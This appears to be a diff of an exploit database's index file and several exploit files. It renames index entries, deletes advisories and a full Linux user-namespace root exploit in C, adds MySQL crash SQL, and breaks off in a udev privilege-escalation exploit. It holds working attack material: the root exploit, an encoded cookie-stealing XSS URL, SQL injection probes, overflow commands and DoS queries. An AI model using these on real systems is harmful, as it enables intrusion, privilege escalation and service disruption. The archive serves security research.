15944,platforms/linux/local/15944.c,"Linux Kernel 2.6.34+ - CAP_SYS_ADMIN x86 & x64 Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion Vulnerbility",2011-01-08,"Abdi Mohamed",php,webapps,0
15946,platforms/windows/dos/15946.py,"IrfanView 4.28 Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0
15957,platforms/windows/remote/15957.py,"KingView 6.5.3 SCADA HMI Heap Overflow PoC",2011-01-09,"Dillon Beresford",windows,remote,0
@ -17261,7 +17254,7 @@ id,file,description,date,author,platform,type,port
19930,platforms/windows/local/19930.rb,"Windows Escalate Task Scheduler XML Privilege Escalation",2012-07-19,metasploit,windows,local,0
19931,platforms/windows/remote/19931.rb,"Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow",2012-07-19,metasploit,windows,remote,998
19932,platforms/windows/remote/19932.rb,"Novell ZENworks Configuration Management Preboot Service 0x21 Buffer Overflow",2012-07-19,metasploit,windows,remote,998
19933,platforms/linux/local/19933.rb,"Linux Kernel Sendpage Local Privilege Escalation",2012-07-19,metasploit,linux,local,0
19933,platforms/linux/local/19933.rb,"Linux Kernel - Sendpage Local Privilege Escalation",2012-07-19,metasploit,linux,local,0
19937,platforms/windows/remote/19937.pl,"Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit",2012-07-19,mr.pr0n,windows,remote,0
19938,platforms/beos/dos/19938.txt,"BeOS 5.0 TCP Fragmentation Remote DoS Vulnerability",2000-05-18,visi0n,beos,dos,0
19939,platforms/windows/remote/19939.html,"Internet Explorer 4.0/5.0/5.5 preview/5.0.1 - DocumentComplete() Cross Frame Access Vulnerability",2000-05-17,"Andrew Nosenko",windows,remote,0
@ -19163,9 +19156,7 @@ id,file,description,date,author,platform,type,port
21912,platforms/php/webapps/21912.txt,"Killer Protection 1.0 Information Disclosure Vulnerability",2002-10-07,frog,php,webapps,0
21913,platforms/windows/remote/21913.txt,"Citrix Published Applications Information Disclosure Vulnerability",2002-10-07,wire,windows,remote,0
21914,platforms/asp/webapps/21914.txt,"SSGBook 1.0 Image Tag HTML Injection Vulnerabilities",2002-10-08,frog,asp,webapps,0
21915,platforms/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002 Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0
21916,platforms/windows/dos/21916.txt,"Kaspersky Labs Anti-Hacker 1.0 Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0
21917,platforms/windows/dos/21917.txt,"BlackIce Server Protection 3.5/BlackICE Defender 2.9 Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0
21915,platforms/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002/ Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0
21918,platforms/php/webapps/21918.html,"VBZoom 1.0 - Remote SQL Injection Vulnerability",2002-10-08,hish,php,webapps,0
21919,platforms/unix/remote/21919.sh,"Sendmail 8.12.6 Trojan Horse Vulnerability",2002-10-08,netmask,unix,remote,0
21920,platforms/asp/webapps/21920.txt,"Microsoft Content Management Server 2001 Cross-Site Scripting Vulnerability",2002-10-09,overclocking_a_la_abuela,asp,webapps,0
@ -21150,22 +21141,19 @@ id,file,description,date,author,platform,type,port
23963,platforms/php/webapps/23963.txt,"TikiWiki Project 1.8 tiki-usermenu.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23964,platforms/php/webapps/23964.txt,"TikiWiki Project 1.8 tiki-list_file_gallery.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23965,platforms/php/webapps/23965.txt,"TikiWiki Project 1.8 tiki-directory_ranking.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23966,platforms/php/webapps/23966.txt,"TikiWiki Project 1.8 tiki-browse_categories.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23966,platforms/php/webapps/23966.txt,"TikiWiki Project 1.8 - tiki-browse_categories.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23967,platforms/php/webapps/23967.txt,"E SMS Script Multiple SQL Injection Vulnerabilities",2013-01-08,"cr4wl3r ",php,webapps,0
23968,platforms/asp/webapps/23968.txt,"Advantech WebAccess HMI/SCADA Software Persistence XSS Vulnerability",2013-01-08,"SecPod Research",asp,webapps,0
23969,platforms/windows/remote/23969.rb,"IBM Cognos tm1admsd.exe Overflow Vulnerability",2013-01-08,metasploit,windows,remote,0
23970,platforms/php/webapps/23970.rb,"WordPress Plugin Google Document Embedder Arbitrary File Disclosure",2013-01-08,metasploit,php,webapps,0
23971,platforms/php/webapps/23971.txt,"TikiWiki Project 1.8 tiki-index.php comments_offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23972,platforms/php/webapps/23972.txt,"TikiWiki Project 1.8 tiki-user_tasks.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23971,platforms/php/webapps/23971.txt,"TikiWiki Project 1.8 - tiki-index.php comments_offset & offset Parameter SQL Injections",2004-04-12,JeiAr,php,webapps,0
23972,platforms/php/webapps/23972.txt,"TikiWiki Project 1.8 - tiki-user_tasks.php offset & sort_mode Parameter SQL Injections",2004-04-12,JeiAr,php,webapps,0
23973,platforms/php/webapps/23973.txt,"TikiWiki Project 1.8 tiki-directory_search.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23974,platforms/php/webapps/23974.txt,"TikiWiki Project 1.8 tiki-file_galleries.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23975,platforms/php/webapps/23975.txt,"TikiWiki Project 1.8 tiki-list_faqs.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23976,platforms/php/webapps/23976.txt,"TikiWiki Project 1.8 tiki-list_trackers.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23977,platforms/php/webapps/23977.txt,"TikiWiki Project 1.8 tiki-list_blogs.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23978,platforms/php/webapps/23978.txt,"TikiWiki Project 1.8 tiki-usermenu.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23979,platforms/php/webapps/23979.txt,"TikiWiki Project 1.8 tiki-browse_categories.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23980,platforms/php/webapps/23980.txt,"TikiWiki Project 1.8 tiki-index.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23981,platforms/php/webapps/23981.txt,"TikiWiki Project 1.8 tiki-user_tasks.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23982,platforms/php/webapps/23982.txt,"TikiWiki Project 1.8 tiki-list_faqs.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23983,platforms/php/webapps/23983.txt,"TikiWiki Project 1.8 tiki-list_trackers.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23984,platforms/php/webapps/23984.txt,"TikiWiki Project 1.8 tiki-list_blogs.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
@ -22423,7 +22411,6 @@ id,file,description,date,author,platform,type,port
25303,platforms/linux/dos/25303.txt,"Multiple Vendor Telnet Client Env_opt_add Heap-Based Buffer Overflow Vulnerability",2005-03-28,"Gael Delalleau",linux,dos,0
25304,platforms/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,php,webapps,0
25305,platforms/multiple/webapps/25305.py,"ColdFusion 9-10 - Credential Disclosure Exploit",2013-05-08,HTP,multiple,webapps,0
25307,platforms/linux/local/25307.c,"Linux Kernel open-time Capability file_ns_capable() - Privilege Escalation Vulnerability",2013-05-08,"Andrew Lutomirski",linux,local,0
25308,platforms/php/webapps/25308.txt,"PhotoPost Pro 5.1 showgallery.php Multiple Parameter XSS",2005-03-28,"Diabolic Crab",php,webapps,0
25309,platforms/php/webapps/25309.txt,"PhotoPost Pro 5.1 showmembers.php Multiple Parameter XSS",2005-03-28,"Diabolic Crab",php,webapps,0
25310,platforms/php/webapps/25310.txt,"PhotoPost Pro 5.1 slideshow.php photo Parameter XSS",2005-03-28,"Diabolic Crab",php,webapps,0
@ -22565,7 +22552,7 @@ id,file,description,date,author,platform,type,port
25447,platforms/php/webapps/25447.txt,"AlienVault OSSIM 4.1.2 - Multiple SQL Injection Vulnerabilities",2013-05-14,RunRunLevel,php,webapps,0
25448,platforms/windows/local/25448.rb,"ERS Viewer 2011 ERS File Handling Buffer Overflow",2013-05-14,metasploit,windows,local,0
25449,platforms/php/webapps/25449.txt,"UMI.CMS 2.9 - CSRF Vulnerability",2013-05-14,"High-Tech Bridge SA",php,webapps,0
25450,platforms/linux/local/25450.c,"Linux Kernel open-time Capability file_ns_capable() Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local,0
25450,platforms/linux/local/25450.c,"Linux Kernel 3.8.x - open-time Capability file_ns_capable() Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local,0
25451,platforms/php/webapps/25451.txt,"PHPBB 1.x/2.0.x Knowledge Base Module KB.PHP SQL Injection Vulnerability",2005-04-13,deluxe@security-project.org,php,webapps,0
25452,platforms/multiple/remote/25452.pl,"Oracle 10g Database SUBSCRIPTION_NAME Remote SQL Injection Vulnerability (1)",2007-02-23,bunker,multiple,remote,0
25453,platforms/multiple/remote/25453.pl,"Oracle 10g Database SUBSCRIPTION_NAME Remote SQL Injection Vulnerability (2)",2007-02-26,bunker,multiple,remote,0
@ -23231,7 +23218,7 @@ id,file,description,date,author,platform,type,port
26128,platforms/osx/dos/26128.html,"Apple Safari 1.3 Web Browser JavaScript Invalid Address Denial of Service Vulnerability",2005-08-09,"Patrick Webster",osx,dos,0
26129,platforms/hardware/webapps/26129.txt,"Buffalo WZR-HP-G300NH2 - CSRF Vulnerability",2013-06-11,"Prayas Kulshrestha",hardware,webapps,0
26130,platforms/windows/dos/26130.py,"WinRadius 2.11 - Denial of Service",2013-06-11,npn,windows,dos,0
26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 perf_swevent_init - Local root Exploit",2013-06-11,"Andrea Bittau",linux,local,0
26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 - x86_64 perf_swevent_init Local root Exploit",2013-06-11,"Andrea Bittau",linux,local,0
26132,platforms/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection Vulnerability",2013-06-11,"CWH Underground",php,webapps,0
26133,platforms/windows/dos/26133.py,"Sami FTP Server 2.0.1 - RETR Denial of Service",2013-06-11,Chako,windows,dos,21
26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow",2013-06-11,metasploit,windows,remote,0
@ -24494,7 +24481,6 @@ id,file,description,date,author,platform,type,port
27423,platforms/php/webapps/27423.txt,"DSCounter 1.2 Index.PHP SQL Injection Vulnerability",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps,0
27424,platforms/php/webapps/27424.txt,"DSDownload 1.0 - Multiple SQL-Injection Vulnerabilities",2006-03-15,"Aliaksandr Hartsuyeu",php,webapps,0
27425,platforms/linux/dos/27425.txt,"Zoo 2.10 - Parse.c Local Buffer Overflow Vulnerability",2006-03-16,"Josh Bressers",linux,dos,0
27426,platforms/linux/local/27426.txt,"Zoo 2.10 Parse.c Local Buffer Overflow Vulnerability",2006-03-16,"Josh Bressers",linux,local,0
27427,platforms/php/webapps/27427.txt,"Contrexx CMS 1.0.x Index.PHP Cross-Site Scripting Vulnerability",2006-03-16,Soot,php,webapps,0
27428,platforms/hardware/remote/27428.rb,"D-Link Devices Unauthenticated Remote Command Execution",2013-08-08,metasploit,hardware,remote,0
27429,platforms/windows/remote/27429.rb,"Firefox onreadystatechange Event DocumentViewerImpl Use After Free",2013-08-08,metasploit,windows,remote,0
@ -24774,9 +24760,8 @@ id,file,description,date,author,platform,type,port
27717,platforms/php/webapps/27717.txt,"phpldapadmin 0.9.8 compare_form.php dn Parameter XSS",2006-04-21,r0t,php,webapps,0
27718,platforms/php/webapps/27718.txt,"phpldapadmin 0.9.8 copy_form.php dn Parameter XSS",2006-04-21,r0t,php,webapps,0
27719,platforms/php/webapps/27719.txt,"phpldapadmin 0.9.8 rename_form.php dn Parameter XSS",2006-04-21,r0t,php,webapps,0
27720,platforms/php/webapps/27720.txt,"phpldapadmin 0.9.8 delete_form.php dn Parameter XSS",2006-04-21,r0t,php,webapps,0
27721,platforms/php/webapps/27721.txt,"phpldapadmin 0.9.8 search.php scope Parameter XSS",2006-04-21,r0t,php,webapps,0
27722,platforms/php/webapps/27722.txt,"phpldapadmin 0.9.8 template_engine.php Multiple Parameter XSS",2006-04-21,r0t,php,webapps,0
27722,platforms/php/webapps/27722.txt,"phpldapadmin 0.9.8 - template_engine.php Multiple Parameter XSS",2006-04-21,r0t,php,webapps,0
27723,platforms/linux/dos/27723.txt,"Yukihiro Matsumoto Ruby 1.x XMLRPC Server Denial of Service Vulnerability",2006-04-21,"Tanaka Akira",linux,dos,0
27724,platforms/php/webapps/27724.txt,"Scry Gallery Directory Traversal Vulnerability",2006-04-21,"Morocco Security Team",php,webapps,0
27725,platforms/php/webapps/27725.txt,"MKPortal 1.1 - Multiple Input Validation Vulnerabilities",2006-04-22,"Mustafa Can Bjorn IPEKCI",php,webapps,0
@ -24898,8 +24883,7 @@ id,file,description,date,author,platform,type,port
27843,platforms/php/webapps/27843.txt,"MyBB 1.1.1 Showthread.PHP SQL Injection Vulnerability",2006-05-09,Breeeeh,php,webapps,0
27844,platforms/asp/webapps/27844.txt,"EPublisherPro 0.9.7 Moreinfo.ASP Cross-Site Scripting Vulnerability",2006-05-09,Dj_Eyes,asp,webapps,0
27845,platforms/php/webapps/27845.php,"ISPConfig 2.2.2/2.2.3 Session.INC.PHP Remote File Include Vulnerability",2006-05-09,ReZEN,php,webapps,0
27846,platforms/asp/webapps/27846.txt,"EImagePro 0 subList.asp CatID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0
27847,platforms/asp/webapps/27847.txt,"EImagePro 0 imageList.asp SubjectID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0
27846,platforms/asp/webapps/27846.txt,"EImagePro 0 - subList.asp CatID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0
27848,platforms/php/webapps/27848.txt,"EImagePro 0 view.asp Pic Parameter SQL Injection",2006-05-09,Dj_Eyes,php,webapps,0
27849,platforms/asp/webapps/27849.txt,"EDirectoryPro Search_result.ASP SQL Injection Vulnerability",2006-05-09,Dj_Eyes,asp,webapps,0
27850,platforms/windows/dos/27850.txt,"Microsoft Infotech Storage Library Heap Corruption Vulnerability",2006-05-09,"Ruben Santamarta ",windows,dos,0
@ -25322,7 +25306,6 @@ id,file,description,date,author,platform,type,port
28282,platforms/php/webapps/28282.txt,"phpbb-auction 1.x auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0
28283,platforms/hardware/webapps/28283.txt,"Zyxel Prestige 660H-61 ADSL Router - RPSysAdmin.HTML Cross-Site Scripting Vulnerability",2006-07-27,jose.palanco,hardware,webapps,0
28284,platforms/windows/remote/28284.html,"Mitsubishi MC-WorkX 8.02 ActiveX Control (IcoLaunch) File Execution",2013-09-15,blake,windows,remote,0
28285,platforms/php/webapps/28285.txt,"Zyxel Prestige 660H-61 ADSL Router RPSysAdmin.HTML Cross-Site Scripting Vulnerability",2006-07-27,jose.palanco,php,webapps,0
28286,platforms/windows/dos/28286.txt,"Microsoft Internet Explorer 6.0 NDFXArtEffects Stack Overflow Vulnerability",2006-07-27,hdm,windows,dos,0
28287,platforms/linux/local/28287.c,"Linux-HA Heartbeat 1.2.3/2.0.x Insecure Default Permissions on Shared Memory Vulnerability",2006-07-27,anonymous,linux,local,0
28288,platforms/linux/local/28288.c,"MidiRecord2 MidiRecord.CC Local Buffer Overflow Vulnerability",2006-07-27,"Dedi Dwianto",linux,local,0
@ -26982,8 +26965,7 @@ id,file,description,date,author,platform,type,port
30040,platforms/php/webapps/30040.txt,"Jetbox CMS 2.1 Email FormMail.PHP Input Validation Vulnerability",2007-05-15,"Jesper Jurcenoks",php,webapps,0
30041,platforms/php/webapps/30041.txt,"Jetbox CMS 2.1 - view/search/ path Parameter XSS",2007-05-15,"Mikhail Markin",php,webapps,0
30042,platforms/php/webapps/30042.txt,"Jetbox CMS 2.1 - view/supplynews Multiple Parameter XSS",2007-05-15,"Mikhail Markin",php,webapps,0
30043,platforms/linux/remote/30043.txt,"Sun Java JDK 1.x - Embedded ICC Profile Image Parser Overflow",2007-05-16,"Chris Evans",linux,remote,0
30044,platforms/linux/dos/30044.txt,"Sun Java JDK 1.x - BMP Parsing Remote Privilege Escalation",2007-05-16,"Chris Evans",linux,dos,0
30043,platforms/linux/remote/30043.txt,"Sun Java JDK 1.x - Multiple Vulnerabilities",2007-05-16,"Chris Evans",linux,remote,0
30045,platforms/windows/remote/30045.html,"PrecisionID Barcode PrecisionID_Barcode.DLL ActiveX 1.9 Control Arbitrary File Overwrite Vulnerability",2007-05-16,shinnai,windows,remote,0
30046,platforms/windows/dos/30046.py,"Computer Associates BrightStor ARCserve Backup <= 11.5 mediasvr caloggerd Denial of Service Vulnerabilities",2007-05-16,"M. Shirk",windows,dos,0
30047,platforms/php/webapps/30047.txt,"VBulletin <= 3.6.6 Calendar.PHP HTML Injection Vulnerability",2007-05-16,"laurent gaffie",php,webapps,0
@ -27181,11 +27163,10 @@ id,file,description,date,author,platform,type,port
30269,platforms/jsp/webapps/30269.txt,"NetFlow Analyzer 5 /jspui/selectDevice.jsp rtype Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0
30270,platforms/jsp/webapps/30270.txt,"NetFlow Analyzer 5 /jspui/customReport.jsp rtype Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0
30271,platforms/java/webapps/30271.txt,"OpManager 6/7 ping.do name Parameter XSS",2007-07-04,Lostmon,java,webapps,0
30272,platforms/java/webapps/30272.txt,"OpManager 6/7 traceRoute.do name Parameter XSS",2007-07-04,Lostmon,java,webapps,0
30272,platforms/java/webapps/30272.txt,"OpManager 6/7 - traceRoute.do name Parameter XSS",2007-07-04,Lostmon,java,webapps,0
30273,platforms/java/webapps/30273.txt,"OpManager 6/7 reports/ReportViewAction.do Multiple Parameter XSS",2007-07-04,Lostmon,java,webapps,0
30274,platforms/java/webapps/30274.txt,"OpManager 6/7 admin/ServiceConfiguration.do operation Parameter XSS",2007-07-04,Lostmon,java,webapps,0
30275,platforms/java/webapps/30275.txt,"OpManager 6/7 admin/DeviceAssociation.do Multiple Parameter XSS",2007-07-04,Lostmon,java,webapps,0
30276,platforms/java/webapps/30276.txt,"OpManager 6/7 map/traceRoute.do name Parameter XSS",2007-07-04,Lostmon,java,webapps,0
30277,platforms/php/webapps/30277.txt,"Maia Mailguard 1.0.2 Login.PHP Multiple Local File Include Vulnerabilities",2007-07-05,"Adriel T. Desautels",php,webapps,0
30278,platforms/windows/remote/30278.c,"SAP DB 7.x Web Server WAHTTP.EXE Multiple Buffer Overflow Vulnerabilities",2007-07-05,"Mark Litchfield",windows,remote,0
30279,platforms/multiple/remote/30279.txt,"SAP Internet Graphics Server <= 7.0 PARAMS Cross Site Scripting Vulnerability",2007-07-05,"Mark Litchfield",multiple,remote,0
@ -29042,10 +29023,9 @@ id,file,description,date,author,platform,type,port
32257,platforms/php/webapps/32257.txt,"PromoProducts 'view_product.php' Multiple SQL Injection Vulnerabilities",2008-08-15,baltazar,php,webapps,0
32258,platforms/cgi/webapps/32258.txt,"AWStats 6.8 'awstats.pl' Cross-Site Scripting Vulnerability",2008-08-18,"Morgan Todd",cgi,webapps,0
32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 english/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
32260,platforms/php/webapps/32260.txt,"Freeway 1.4.1.171 french/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
32261,platforms/windows/local/32261.rb,"MicroP 0.1.1.1600 - (.mppl) Local Stack Based Buffer Overflow",2014-03-14,"Necmettin COSKUN",windows,local,0
32263,platforms/php/webapps/32263.txt,"Trixbox (endpoint_aastra.php, mac param) - Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80
32264,platforms/php/webapps/32264.txt,"Freeway 1.4.1.171 french/account_newsletters.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
32264,platforms/php/webapps/32264.txt,"Freeway 1.4.1.171 - french/account_newsletters.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
32265,platforms/php/webapps/32265.txt,"Freeway 1.4.1.171 includes/modules/faqdesk/faqdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
32266,platforms/php/webapps/32266.txt,"Freeway 1.4.1.171 includes/modules/newsdesk/newsdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
32267,platforms/php/webapps/32267.txt,"Freeway 1.4.1.171 templates/Freeway/boxes/card1.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
@ -30107,3 +30087,8 @@ id,file,description,date,author,platform,type,port
33392,platforms/php/webapps/33392.txt,"YOOtheme Warp5 Joomla! Component 'yt_color' Parameter Cross Site Scripting Vulnerability",2009-12-04,andresg888,php,webapps,0
33393,platforms/php/webapps/33393.txt,"Joomla! You!Hostit! 1.0.1 Template Cross-Site Scripting Vulnerability",2009-12-04,andresg888,php,webapps,0
33394,platforms/php/webapps/33394.txt,"Invision Power Board <= 3.0.3 '.txt' File MIME-Type Cross Site Scripting Vulnerability",2009-12-09,Xacker,php,webapps,0
33396,platforms/php/webapps/33396.txt,"Zeeways ZeeJobsite 'basic_search_result.php' Cross Site Scripting Vulnerability",2009-12-10,bi0,php,webapps,0
33397,platforms/linux/dos/33397.txt,"MySQL <= 6.0.9 SELECT Statement WHERE Clause Sub-query DoS",2009-11-23,"Shane Bester",linux,dos,0
33398,platforms/linux/dos/33398.txt,"MySQL <= 6.0.9 GeomFromWKB() Function First Argument Geometry Value Handling DoS",2009-11-23,"Shane Bester",linux,dos,0
33399,platforms/multiple/remote/33399.txt,"Oracle E-Business Suite 11i Multiple Remote Vulnerabilities",2009-12-14,Hacktics,multiple,remote,0
33400,platforms/php/webapps/33400.txt,"Ez Cart 'sid' Parameter Cross Site Scripting Vulnerability",2009-12-14,anti-gov,php,webapps,0

Can't render this file because it is too large.

7
platforms/asp/webapps/27847.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/17911/info
EImagePro is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploits could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
http://www.example.com/imagegallery/subList.asp?CatID=&#039;

7
platforms/java/webapps/30276.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/24767/info
OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/map/traceRoute.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C% 6F%73%74%6D%6F%6E%2E62% 6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%2 0%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3 E%3C%2F%62%6F%64%79%3E

9
platforms/linux/dos/30044.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/24004/info
Sun JDK is prone to a multiple vulnerabilities.
An attacker can exploit these issues to crash the affected application, effectively denying service. The attacker may also be able to execute arbitrary code, which may facilitate a compromise of the underlying system.
Sun JDK 1.5.0_07-b03 is vulnerable to these issues; other versions may also be affected.
http://www.exploit-db.com/sploits/30043.zip

17
platforms/linux/dos/33397.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/37297/info
MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.
An attacker can exploit these issues to crash the application, denying access to legitimate users.
Versions prior to MySQL 5.0.88 and 5.1.41 are vulnerable.
drop table if exists `t1`;
create table `t1`(`a` float);
insert into `t1` values (-2),(-1);
select 1 from `t1`
where
`a` <> '1' and not
row(`a`,`a`) <=>
row((select 1 from `t1` where 1=2),(select 1 from `t1`))
into @`var0`;

14
platforms/linux/dos/33398.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/37297/info
MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.
An attacker can exploit these issues to crash the application, denying access to legitimate users.
Versions prior to MySQL 5.0.88 and 5.1.41 are vulnerable.
drop table if exists `t1`;
create table `t1`(`c0` bigint,`c3` multipolygon);
insert into `t1` values
(0,geomfromtext('multipolygon(((1 2,3 4,5 6,7 8,9 8),(7 6,5 4,3 2,1 2,3 4)))'));
select 1 from `t1` where
`c0` <> (select geometrycollectionfromwkb(`c3`) from `t1`);

94
platforms/linux/local/25307.c
View file

@ -1,94 +0,0 @@
/* userns_root_sploit.c by */
/* Copyright (c) 2013 Andrew Lutomirski. All rights reserved. */
/* You may use, modify, and redistribute this code under the GPLv2. */
#define _GNU_SOURCE
#include <unistd.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <err.h>
#include <linux/futex.h>
#include <errno.h>
#include <unistd.h>
#include <sys/syscall.h>
#ifndef CLONE_NEWUSER
#define CLONE_NEWUSER 0x10000000
#endif
pid_t parent;
int *ftx;
int childfn()
{
int fd;
char buf[128];
if (syscall(SYS_futex, ftx, FUTEX_WAIT, 0, 0, 0, 0) == -1 &&
errno != EWOULDBLOCK)
err(1, "futex");
sprintf(buf, "/proc/%ld/uid_map", (long)parent);
fd = open(buf, O_RDWR | O_CLOEXEC);
if (fd == -1)
err(1, "open %s", buf);
if (dup2(fd, 1) != 1)
err(1, "dup2");
// Write something like "0 0 1" to stdout with elevated capabilities.
execl("./zerozeroone", "./zerozeroone");
return 0;
}
int main(int argc, char **argv)
{
int dummy, status;
pid_t child;
if (argc < 2) {
printf("usage: userns_root_sploit COMMAND ARGS...\n\n"
"This will run a command as (global) uid 0 but no capabilities.\n");
return 1;
}
ftx = mmap(0, sizeof(int), PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_ANONYMOUS, -1, 0);
if (ftx == MAP_FAILED)
err(1, "mmap");
parent = getpid();
if (signal(SIGCHLD, SIG_DFL) != 0)
err(1, "signal");
child = fork();
if (child == -1)
err(1, "fork");
if (child == 0)
return childfn();
*ftx = 1;
if (syscall(SYS_futex, ftx, FUTEX_WAKE, 1, 0, 0, 0) != 0)
err(1, "futex");
if (unshare(CLONE_NEWUSER) != 0)
err(1, "unshare(CLONE_NEWUSER)");
if (wait(&status) != child)
err(1, "wait");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, "child failed");
if (setresuid(0, 0, 0) != 0)
err(1, "setresuid");
execvp(argv[1], argv+1);
err(1, argv[1]);
return 0;
}

13
platforms/linux/local/27426.txt
View file

@ -1,13 +0,0 @@
source: http://www.securityfocus.com/bid/17126/info
Zoo is prone to a local buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer.
An attacker can exploit this issue to execute arbitrary code in the context of the victim user running the affected application to potentially gain elevated privileges.
mkdir `perl -e 'print "A"x254'`
cd `perl -e 'print "A"x254'`
mkdir `perl -e 'print "A"x254'`
cd `perl -e 'print "A"x254'`
touch feh
cd ../..
zoo a arch.zoo `perl -e 'print "A"x254 . "/" . "A"x254 . "/feh"'`

220
platforms/linux/local/8572.c
View file

@ -1,110 +1,110 @@
/*
* cve-2009-1185.c
*
* udev < 141 Local Privilege Escalation Exploit
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
*
* udev before 1.4.1 does not verify whether a NETLINK message originates
* from kernel space, which allows local users to gain privileges by sending
* a NETLINK message from user space.
*
* Notes:
*
* An alternate version of kcope's exploit. This exploit leverages the
* 95-udev-late.rules functionality that is meant to run arbitrary commands
* when a device is removed. A bit cleaner and reliable as long as your
* distro ships that rule file.
*
* Tested on Gentoo, Intrepid, and Jaunty.
*
* Usage:
*
* Pass the PID of the udevd netlink socket (listed in /proc/net/netlink,
* usually is the udevd PID minus 1) as argv[1].
*
* The exploit will execute /tmp/run as root so throw whatever payload you
* want in there.
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
